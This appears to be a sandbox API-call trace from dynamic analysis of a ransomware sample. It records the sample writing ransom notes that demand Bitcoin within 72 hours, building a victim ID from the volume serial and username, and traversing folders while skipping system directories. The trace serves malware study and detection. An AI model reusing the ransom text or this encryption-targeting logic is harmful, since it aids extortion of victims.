	[0177.661] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.661] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.664] CloseHandle (hObject=0x384) returned 1
	[0177.665] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.665] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.667] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.667] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.667] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.667] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.667] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.668] CloseHandle (hObject=0x384) returned 1
	[0177.668] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.668] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.668] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.669] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0177.669] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.673] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.673] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.676] CloseHandle (hObject=0x384) returned 1
	[0177.676] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.676] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.677] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.678] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.678] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.678] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.678] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.679] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.679] CloseHandle (hObject=0x384) returned 1
	[0177.679] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836e9136, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.679] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned 40
	[0177.679] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.680] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\*.*") returned 0x28
	[0177.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="windows") returned 0x0
	[0177.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="boot") returned 0x0
	[0177.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="system volume information") returned 0x0
	[0177.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.681] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.681] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="temp") returned 0x0
	[0177.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.681] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="program files") returned 0x0
	[0177.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.681] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.682] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="appdata") returned 0x0
	[0177.682] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.683] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="application data") returned 0x0
	[0177.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.683] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="winnt") returned 0x0
	[0177.683] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.684] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="tmp") returned 0x0
	[0177.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.684] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="cache") returned 0x0
	[0177.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.684] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.684] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="webcache") returned 0x0
	[0177.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.685] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="inetcache") returned 0x0
	[0177.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.685] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="nvidia") returned 0x0
	[0177.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.685] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="packages") returned 0x0
	[0177.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.685] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="cookies") returned 0x0
	[0177.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.686] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="programdata") returned 0x0
	[0177.686] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.686] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.686] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836e9136, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.686] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.686] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMProfiles", cAlternateFileName="DMPROF~1")) returned 1
	[0177.686] lstrcmpW (lpString1="DMProfiles", lpString2="..") returned 1
	[0177.686] lstrcmpW (lpString1="DMProfiles", lpString2=".") returned 1
	[0177.687] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc"
	[0177.687] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\"
	[0177.687] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="DMProfiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles"
	[0177.687] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles"
	[0177.687] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\"
	[0177.687] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\"
	[0177.687] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*"
	[0177.687] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.688] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*") returned 51
	[0177.688] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.688] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*") returned 0x33
	[0177.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.688] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="windows") returned 0x0
	[0177.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="boot") returned 0x0
	[0177.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="system volume information") returned 0x0
	[0177.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="temp") returned 0x0
	[0177.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.690] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="program files") returned 0x0
	[0177.690] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.690] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.690] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.690] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="appdata") returned 0x0
	[0177.690] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.690] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="application data") returned 0x0
	[0177.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="winnt") returned 0x0
	[0177.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="tmp") returned 0x0
	[0177.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="cache") returned 0x0
	[0177.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.691] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="webcache") returned 0x0
	[0177.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="inetcache") returned 0x0
	[0177.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="nvidia") returned 0x0
	[0177.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="packages") returned 0x0
	[0177.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="cookies") returned 0x0
	[0177.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\*.*", lpSrch="programdata") returned 0x0
	[0177.693] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.693] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.693] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.694] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.694] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles"
	[0177.694] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*"
	[0177.694] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.695] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.695] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0177.695] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.695] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.696] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189728, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0) returned 0
	[0177.696] CloseHandle (hObject=0xffffffff) returned 1
	[0177.696] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.697] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0177.698] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.698] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.698] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0177.698] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.699] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a578, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0) returned 0
	[0177.699] CloseHandle (hObject=0xffffffff) returned 1
	[0177.699] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.699] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.699] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
